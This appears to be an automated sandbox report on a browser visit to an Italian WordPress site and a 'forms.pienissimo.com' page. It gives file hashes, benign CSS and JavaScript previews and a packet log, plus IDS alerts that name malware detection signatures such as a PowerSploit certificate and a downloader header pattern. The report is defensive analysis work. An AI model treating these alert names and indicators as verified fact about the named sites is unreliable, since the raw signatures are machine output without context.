                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):6251
                                                                                                                                              Entropy (8bit):4.840033816578664
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:sTNbRaUd/59mgVaEqE/fYfkQuwF3AfwciwNkWkl/dtYHz/y3vbO/Np3paSpaESvy:0NhiknOS4MnKaxu9NPXlZAnR1lR
                                                                                                                                              MD5:801192296C1C55C34288E51F8C186C39
                                                                                                                                              SHA1:2DA9DF4CC5DF6C9BC789AE85F6A81F9C5F2D0ECE
                                                                                                                                              SHA-256:523CCEA282E6CBA4630AF51C673315D942F4249E2ADA9A0390C37E6E58B9FCBB
                                                                                                                                              SHA-512:BD258F1B2EC6640D3F651D542E847531341F7A69B7BF7A460F7E563186B73E884EA3AF3DB42613460DAF99EF835E67EB14B9DD4A1B6FB34A4371F2E2DE9C70CB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Testimonials.====================================================================================================================================================== */...avia-testimonial{.border-right-style: dashed;.border-right-width: 1px;.border-bottom-style: dashed;.border-bottom-width: 1px;.padding:20px;.}...avia-first-testimonial{clear:both;}..avia-testimonial-wrapper .avia-testimonial-row:last-child .avia-testimonial{border-bottom:none;}..avia-testimonial.avia-last-testimonial, .avia-grid-1-testimonials .avia-testimonial{border-right:none;}..avia-testimonial-image img{border-radius: 100px;}..avia-testimonial-image{float:left; margin:0 20px 0 0; width:80px; height:80px; border-radius: 100px; overflow: hidden; background-size: contain; background-position: center center;}..avia-testimonial-content{overflow: hidden;}..avia-testimoni
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):13208
                                                                                                                                              Entropy (8bit):4.250198143484081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:EMXzMZxBriAIqBh7A0XmPU2G+3ml7boWqXSUfvlhdUaBYmXQ1i:dqxJxIqBC0WPU2G+Wl78h7vfdemUi
                                                                                                                                              MD5:791B7ECF968525ABE7A4E9302B5024C0
                                                                                                                                              SHA1:6B8C060F1A70733BBF4CC9BDF22324F8C37E96AB
                                                                                                                                              SHA-256:3A7DC7BFF26B0FB5829B872E30A348933BBAB87CDF920DB9760A08913055F97B
                                                                                                                                              SHA-512:1CE5C1B7048DC47D8666562654EAC8BD23F188738D679AB8C06A420AE07491B5C9D18C69556EE89C47C16F3274B6F7E4CBE95592913674BE755F86585275E449
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($) {.. 'use strict';.... /*-------------------------------------------------------------------------------.. Preloader...-------------------------------------------------------------------------------*/.. $(window).on('load', function() {.. $('.ct-preloader').addClass('hidden');.. });.... /*-------------------------------------------------------------------------------.. Aside Menu...-------------------------------------------------------------------------------*/.. $(".aside-trigger").on('click', function() {.. $(".main-aside").toggleClass('open');.. });.. $(".main-aside .menu-item-has-children > a").on('click', function(e) {.. var submenu = $(this).next(".submenu");.. e.preventDefault();.... submenu.slideToggle(200);.. }).... /*-------------------------------------------------------------------------------.. Cart Trigger.. -------------------------------------------------------------------------------*/.. $(".cart-trigger").on('click', function
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (8649), with CRLF, LF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):92886
                                                                                                                                              Entropy (8bit):5.459192234433859
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:qXCn0qVekwNGV/ASV86t+ev+eG+ek+e++eNHhei4EY0HdlzGK+R6h8dx1ZFklA4G:lqGd3VTJ8mMjH1Y0HeklA4/WmTHvpGsK
                                                                                                                                              MD5:282FE0AE618C6607673A818C1C9E0ACD
                                                                                                                                              SHA1:7AB4C8DADDFF04028F73116CB1A30F13F6FAEAC2
                                                                                                                                              SHA-256:C717200D8E7BC79669AFA3C8A5C34DDE10A2BF3F831B5DB8B0ED224CCB168FC7
                                                                                                                                              SHA-512:2972A43410F2146698A0B77D59DC2B66F78591882BA5A263374D9BB91C1730928B6CF3A51D9D557808A67DCAD220EFEFD1B24B5D63EB96A1F5AFA5BED0E2753D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/
                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="it-IT" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking html_header_topbar_active html_mobile_menu_phone html_header_searchicon_disabled html_content_align_center html_header_unstick_top_disabled html_header_stretch_disabled html_minimal_header html_av-submenu-hidden html_av-submenu-display-click html_av-overlay-side html_av-overlay-side-classic html_av-submenu-noclone html_entry_id_838 av-no-preview html_text_menu_active ">.<head>.<meta charset="UTF-8" />... mobile setting -->.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">.. Scripts/CSS and wp_head hook -->.<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />.<link rel="alternate" hreflang="it" href="https://www.cipassoitalia.it" />.<link rel="alternate" hrefl
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):13208
                                                                                                                                              Entropy (8bit):4.250198143484081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:EMXzMZxBriAIqBh7A0XmPU2G+3ml7boWqXSUfvlhdUaBYmXQ1i:dqxJxIqBC0WPU2G+Wl78h7vfdemUi
                                                                                                                                              MD5:791B7ECF968525ABE7A4E9302B5024C0
                                                                                                                                              SHA1:6B8C060F1A70733BBF4CC9BDF22324F8C37E96AB
                                                                                                                                              SHA-256:3A7DC7BFF26B0FB5829B872E30A348933BBAB87CDF920DB9760A08913055F97B
                                                                                                                                              SHA-512:1CE5C1B7048DC47D8666562654EAC8BD23F188738D679AB8C06A420AE07491B5C9D18C69556EE89C47C16F3274B6F7E4CBE95592913674BE755F86585275E449
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/assets/js/main.js?_=1735922053693
                                                                                                                                              Preview:(function($) {.. 'use strict';.... /*-------------------------------------------------------------------------------.. Preloader...-------------------------------------------------------------------------------*/.. $(window).on('load', function() {.. $('.ct-preloader').addClass('hidden');.. });.... /*-------------------------------------------------------------------------------.. Aside Menu...-------------------------------------------------------------------------------*/.. $(".aside-trigger").on('click', function() {.. $(".main-aside").toggleClass('open');.. });.. $(".main-aside .menu-item-has-children > a").on('click', function(e) {.. var submenu = $(this).next(".submenu");.. e.preventDefault();.... submenu.slideToggle(200);.. }).... /*-------------------------------------------------------------------------------.. Cart Trigger.. -------------------------------------------------------------------------------*/.. $(".cart-trigger").on('click', function
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (11126)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):11224
                                                                                                                                              Entropy (8bit):5.2603128465032745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                                              MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                                              SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                                              SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                                              SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                                                                                                                                              Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1294
                                                                                                                                              Entropy (8bit):4.564848324745613
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:qeybvLD+fCq6GewA6GbCRkFG8k6u4TEnS+GbcEjXISqLJs:qeybP+K9GewbGbGDGV4Sx
                                                                                                                                              MD5:76BD37C22873548C765D47678315ADEE
                                                                                                                                              SHA1:189F4CFE973947DC16D4E629BB83468D96AF80C4
                                                                                                                                              SHA-256:23CC3301BBD30228A15F284C7247FAA7FA1F64740240113FC1BF01120C0889F2
                                                                                                                                              SHA-512:FE6AB43C633E0770050DEFD978E9D825B656418E3F3AEF447F91B8E75998D5B7D520E5C194942B490875A121E8BFB2B2BCDEC84DC7CFB6F8C38B50374FAC32AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Promo Box.====================================================================================================================================================== */...av_promobox{.position: relative;.border-width: 1px;.border-style: solid;.overflow: hidden;.padding:20px 30px;.clear:both;.margin:50px 0;.width:100%;.float:left;.}...flex_column >.av_promobox:first-child{margin-top:0;}...av_promobox .avia-button{.right: 30px;.top: 50%;.position: absolute;.z-index: 2;.}...avia-promocontent{.margin-right:200px;.position: relative;.z-index: 3;..}...avia-promocontent p{.font-size: 14px;.}...avia-button-no .avia-promocontent{margin:0;}..avia-button-no .avia-button{display:none;}...av_promobox .avia-button.avia-size-small{ margin-top:-15px; }..av_promobox .avia-button.avia-size-medium{ margin-top:-19px; }..av_promobox .avia-button.avia-size-larg
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2070
                                                                                                                                              Entropy (8bit):4.783037945492784
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:7Nzl9vMJyJTDjQJYWn5u5Mi5tbfW4fJQIMWR:797DhQIBR
                                                                                                                                              MD5:C22B0CFEC5A0A2EC1E10701B03EAA161
                                                                                                                                              SHA1:01F6683E59659CB223BF2F61528D8F8772D86543
                                                                                                                                              SHA-256:A77CE3A51AA38669B59928125FACEE4EA3D346C2B609ABF7A39014943C5C2458
                                                                                                                                              SHA-512:7A6E67C18D713C777E18929E6C6F4735B89751BAAC0A6F3C6AE0B814192058397D2A9B096CC02A33E003FEAA40E8F2EA22945E750BE9DCD2C28027D75ABF400A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Slideshow Fullscreen.====================================================================================================================================================== */...avia-fullscreen-slider {border-top:none;}..avia-fullscreen-slider .avia_loading_icon{position: absolute;}..avia-fullscreen-slider .avia-slideshow{margin: 0; height:1500px; height:100vh; min-height: 250px;}..avia-fullscreen-slider .avia-slideshow-inner{width:100%; height:100%; position: absolute;...-ms-perspective: 1000px; /*fixes: ie11 css flicker of following elements on transition*/.-ms-backface-visibility: hidden;..}...avia-fullscreen-slider .avia-slideshow>ul>li{width:100%; height:100%;.background-size: cover;.background-position: center center;.}...avia-fullscreen-slider .avia-slideshow[data-image_attachment="fixed"]>ul>li{..background-attachment: fixed;.}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5457
                                                                                                                                              Entropy (8bit):7.211297040750758
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ghChjyVDHlphgyOUGeGOArHWPaEqFW6+/VyW9+d9Fj4cnwHjj2VdJwq0J4ejySV+:mgyVDOKGaPaEqFW6+wW9I9F0cnsjj6JZ
                                                                                                                                              MD5:DB8521A2325F0489C6D4B31C4FE597B8
                                                                                                                                              SHA1:615CBE6C115923F864CDC1BB06A9151EF6F50B24
                                                                                                                                              SHA-256:2C8BB41B609DCB460668BFCA195CCC889BCAE7FF6F8BEB0E3C8F6C9830D4A7E5
                                                                                                                                              SHA-512:FC34DF0D1ED9D7CFEFFA4DFD3612F2639D23C8715A34B954C29ACED658AF9892AC20DB621C612B30F89A48B82FD1CCCFF8A70E655497C155B5FD9C07AC53DA59
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/pattern.385356b129fcfde56de8.jpg
                                                                                                                                              Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......X.X.."...................................'....................A1!Qaq...."B...2...........................................................?..!f2....i...B.|.}'._......Y~......A.&|K.....H......&.$.bN.......;.I..N.."..=...G............=(.....J.ezI...........D......XDz...P,.l...5"|.j.......K......X.O..E.>.lC...!`.$.....@.....N.`.....O..?..y~....%....3d|.p$..4(.Do........GN...+3....j...P..T.....Q.4.9 D...k..#..@4 ...f.....BG...T.....P..J.A...@.)d.'.p.~..,..v.a.....)...L.....W..G..e=......".A.@Xv.)m#.).@.....;.S.."..,u.q...y....Dx.z..8.*`..H.PP@O.X.X.I.]0......L=.@.....O...#........-.z......'.D.GAi .P......}.O....j...Yu.X.F...i....gE.CJ...'...9...s....W.......a>..LX....*R..T^...)A$...?...R..@....X....H..E..M'.T.)8..t........RW...T.....z..%..)D...H....:`.J.$..b.=_R@>,....#S..B. XX.......,...$...H\..!l.J.4...)}..T(...
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):672
                                                                                                                                              Entropy (8bit):4.967792751769964
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2PHM7CYzBiRiocnsG6p6yf2agxNPhz+feTnntWyXoHQIOeYYBMb:2kOYzBci3XSNgx9xnwyYwAYYBMb
                                                                                                                                              MD5:1413AE49C9023A3F89AE95C070FC0CEF
                                                                                                                                              SHA1:90D49808B303E03CFC8E4C6256FF1234282967D4
                                                                                                                                              SHA-256:E3572EB2976BB93C07DD313D9A917D4C6CF89E1A118A48B391B8DE918F999D86
                                                                                                                                              SHA-512:3F67E87FD15B75E5C5A52F45F546874C0605D2759CDB8487B459CFBDAB44BB8752ED354A367B81089F6E31654BB3608EF71C60CDCD2816BA34F9E3F8CF45D144
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";.....$('body').on('click','.av-lazyload-video-embed .av-click-to-play-overlay', function(e){......if(document.cookie.match(/aviaPrivacyVideoEmbedsDisabled/))...{....if (e.originalEvent === undefined) return; //human click only..... ....var src_url = $(this).parents('.avia-video').data('original_url');....if( src_url ) window.open(src_url , '_blank'); ........return;...}.........var clicked .= $(this),....container.= clicked.parents('.av-lazyload-video-embed'),....video..= container.find('.av-video-tmpl').html();........container.html(video);..});....$('.av-lazyload-immediate .av-click-to-play-overlay').trigger('click');...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (551)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):227261
                                                                                                                                              Entropy (8bit):5.483775665452673
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:vHdwBc2ltglAnjnc5g0Ci0s0LLM+L3Fv+zMqxAKp:vHdYtgkg5gLi0s0LLM+L3FPq6Kp
                                                                                                                                              MD5:7204A090B5E030D4C2CD9FF168D00C7A
                                                                                                                                              SHA1:B68C14E834050BD237D222F7F8772C8D87EC1BE9
                                                                                                                                              SHA-256:1B16FB7B71EB885AB2F0310063BA192F2786F428CD4F52C21596C88CCD8DD848
                                                                                                                                              SHA-512:DFD75CC95F1FC5919B7E7EF5430C45E09069E2B0A0D9EA6D5333737CA3FBE297320C067654E54D79A4CACA17E4B413BE5B09E3C55EE835308FF345B533F676AC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Pa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Pa(u(ba))}.var Of="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Pf;if("function"==typeof Object.setPrototypeOf)Pf=Object.setPrototypeOf;else{var Mh;a:{var Nh={a:!0},Oh={};try{Oh.__proto__=Nh;Mh=Oh.a;break a}catch(ba){}Mh=!1}Pf=Mh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Fm=Pf;.function Gm(ba,ta){ba.prototype=Of(ta.prototype);ba.prototype.constructor=ba;if(Fm)Fm(ba,ta);else for(var $a in ta)if("p
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2106
                                                                                                                                              Entropy (8bit):5.089628914590677
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cL3B241lh+3bn3c3HCbmABEzEO31mzB3aswIzD77TNuw+lYD0JoKT:cL30O/qaZQkSPNJKYYGKT
                                                                                                                                              MD5:1576E8FB56FD21B095F1DAC17969D2B8
                                                                                                                                              SHA1:49A5726BA4EEA18651378C5C3DE530C6A9BF9688
                                                                                                                                              SHA-256:EFDD464E865BD091AC6944B9D999124C8E19FA28A23F25F55651BBDEA9A4BDA9
                                                                                                                                              SHA-512:56C1A18C78D63A935B06A4358B029D36D938C110F1EF822B723140E0987CE0B2D1135FFE22B54966D129DDD7A4AE0E5EDD95CCFA5928D5F5FBEE92A79A940FF7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-compat.js?ver=4.5
                                                                                                                                              Preview:/* ..this prevents dom flickering for elements hidden with js, needs to be outside of dom.ready event.also adds several extra classes for better browser support ..this is a separate file that needs to be loaded at the top of the page. other js functions are loaded before the closing body tag to make the site render faster.*/."use strict"..var avia_is_mobile = false;.if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement).{..avia_is_mobile = true;..document.documentElement.className += ' avia_mobile ';.}.else.{..document.documentElement.className += ' avia_desktop ';.}.document.documentElement.className += ' js_active ';..(function(){..//set transform property. var prefix = ['-webkit-','-moz-', '-ms-', ""], transform = "";. for (var i in prefix). { . .// http://artsy.github.io/blog/2012/10/18/so-you-want-to-do-a-css3-3d-transform/. .if(prefix[i]+'transform' in document.documentElement.st
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (20087)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20216
                                                                                                                                              Entropy (8bit):5.338721920008614
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:lPhVPXQ2G2XAQyqVxRQ5giCCMLtA15h5/F6l8aZwHwztLCpmst:lPBIt8I5h5t1qkOLCMst
                                                                                                                                              MD5:BA6CF724C8BB1CF5B084E79FF230626E
                                                                                                                                              SHA1:F455C5F153F872E52265F87A644FF89FE14A6FB6
                                                                                                                                              SHA-256:3FDDC6D28ABA3C13D64CFD4847C333FF48C71D4A5A58BD1A0494CA6AE8AC1BB4
                                                                                                                                              SHA-512:22C361E44DDE632DEDAFF2625F6631E2FB02BA3B6487097B48BAA09F02CD81FD381EBB7D053F525E52E56655B1F8E2B89DDCC0A002E1B0C35C0A6920823641D7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/*! Magnific Popup - v1.1.0 - 2016-02-20.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2016 Dmitry Semenov; */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41549
                                                                                                                                              Entropy (8bit):3.891076478580473
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:JIk9w1DFY7Z1kB1gkRWyh+XcmVDPCrJ/O8H1IAWWkxf:JJwC3E1gkRWyhUc0DKN/TH1IA/kZ
                                                                                                                                              MD5:9B7FD1F4BBDBE44A159903D73AC3A7E1
                                                                                                                                              SHA1:AC40F40CF5B6939B42FC505977904CDA0F94BA57
                                                                                                                                              SHA-256:C853A9F189F3869E21307B1DBBFCE7376289D7EECBDEC3CD67BF295A03184C16
                                                                                                                                              SHA-512:AA9678998647837C91DC4E9B30779FE04164CC14B39B3C5C3CB961458C39FACC7D90EF36E0F8A1355D37BBB7883180342C95790DD1E627AD64536B028EE37E73
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="flag-icons-hr" viewBox="0 0 640 480">. <path fill="#171796" d="M0 0h640v480H0z"/>. <path fill="#fff" d="M0 0h640v320H0z"/>. <path fill="red" d="M0 0h640v160H0zm320 364.1c51.3 0 93.3-42 93.3-93.3V160H226.7v110.8c0 51.4 42 93.4 93.3 93.4z"/>. <path fill="#fff" d="M320 362.6a91.8 91.8 0 0 0 91.6-91.5V161.8H228.5V271a91.8 91.8 0 0 0 91.5 91.5z"/>. <g fill="red">. <path d="M267.1 165.2H232v38.7h35.2zm0 77.4h35.3v-38.7H267zM232 270.9c0 3.5.2 7 .6 10.4h34.6v-38.7H232v28.3zm105.7-28.3h-35.2v38.7h35.2zm0 77.4h35.2v-38.7h-35.2zm35.2 21.2A89.2 89.2 0 0 0 393 320h-20v21.2zM267.1 320h35.3v-38.7H267zm-20.1 0a89.2 89.2 0 0 0 20.1 21.2V320H247zm79.1 38.7c4-.3 7.7-.8 11.5-1.6V320h-35.2v37.1a87 87 0 0 0 11.4 1.6c4.1.3 8.2.2 12.3 0z"/>. <path d="M407.4 281.3c.4-3.4.6-6.9.6-10.4v-28.3h-35.2v38.7h34.6zm-69.8-38.7h35.2v-38.7h-35.2zm0-77.4h-35.2v38.7h35.2zm70.4 38.7v-38.7h-35.2v38.7z"/>. </g>. <path fill="#fff
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 627, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1490857
                                                                                                                                              Entropy (8bit):7.989958536302157
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:SEOyLri+sYNFU9QgsEJhobTPgUXedbQOyxuh+ORCoJC5VXcy2Q9O6j:/zBsqKigsEkbTgUXedspURCmnyZ9Hj
                                                                                                                                              MD5:2AB043490AC102D475BF438F716917C0
                                                                                                                                              SHA1:E2CA42DBE4B58C9732CB8B6857374CA65CE8B26C
                                                                                                                                              SHA-256:090E5EEF655D7585F9CB8A875CC1F0AD9D1E55EDA45086F399BBEC7A5502C17A
                                                                                                                                              SHA-512:4488A2A31BD374D5DECDF282CE3CDB05F927D6C8686DB8ED3A64C75F964953059A598D49938D2AE81077C170371A88CDAC663E6C9D8C63647D8F134A618393EF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.05.png
                                                                                                                                              Preview:.PNG........IHDR.......s........0...KiCCPICC Profile..X..y.8.]....|....<.d..y.g.....C.$c.BH%.+.B%".J.zH.H.J..B..z..y.....}].....k.....un...|##.....G.P.L....=..s..x...\...H};;+.......a.m.Oe6d.w...0..D....`...M...U.P..Hj.....P|L...+`....8s..m..../m.89......./5...~...G..e./.}...J..,(...........y"a.1.5.......~.d.....[s.,8#Jtd....;......[.(\i..f..s..6...r...x>.....D....o...A..5s..Gp...a..V.....Y...&.a6V.t.@..9....H..;........<.....u!..........M....cC.......0...O.vr.1...q......X6:..r.G+1...7.5.a.~a.;.D..l.G..RM........y:.bn.....;.m...M......? B.....h7..s..02.;r. ..q[.......(Bd..6?J0 .t...c..8..(..xAn.G.F..9m.J....u.X.C`..A,\..n..(O.[.._[=&..PA...2..#\7{".#H..`.....3....q0.....S..n..m...30... ....9*.6....P.K./\..ap......S......mJ.o....91..#....#..D.4QV.S...(5...y...A.._......(i..Yi.&`.&..../P..Le..J...KF..8..J....5+.T.m.7.../..1..Dc../.G...zx......W.#e......~..m........}....7'2.....D. .-...lE."om.?........a.PX......'......o...$l...pw..*%(8._......#...
                                                                                                                                              No static file info
                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2025-01-03T17:33:19.262961+01002814904ETPRO MALWARE PowerSploit SSL Cert1104.21.27.98443192.168.2.1649956TCP
                                                                                                                                              2025-01-03T17:33:40.973021+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1649964188.114.97.3443TCP
                                                                                                                                              2025-01-03T17:34:46.475813+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1650108104.16.124.96443TCP
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jan 3, 2025 17:32:45.271367073 CET4970880192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:32:45.276249886 CET804970889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:32:45.276323080 CET4970880192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:32:45.276675940 CET4970880192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:32:45.279438019 CET4970980192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:32:45.282882929 CET804970889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:32:45.285182953 CET804970989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:32:45.285305977 CET4970980192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:32:45.943126917 CET804970889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:32:45.987493992 CET4970880192.168.2.1689.46.108.67
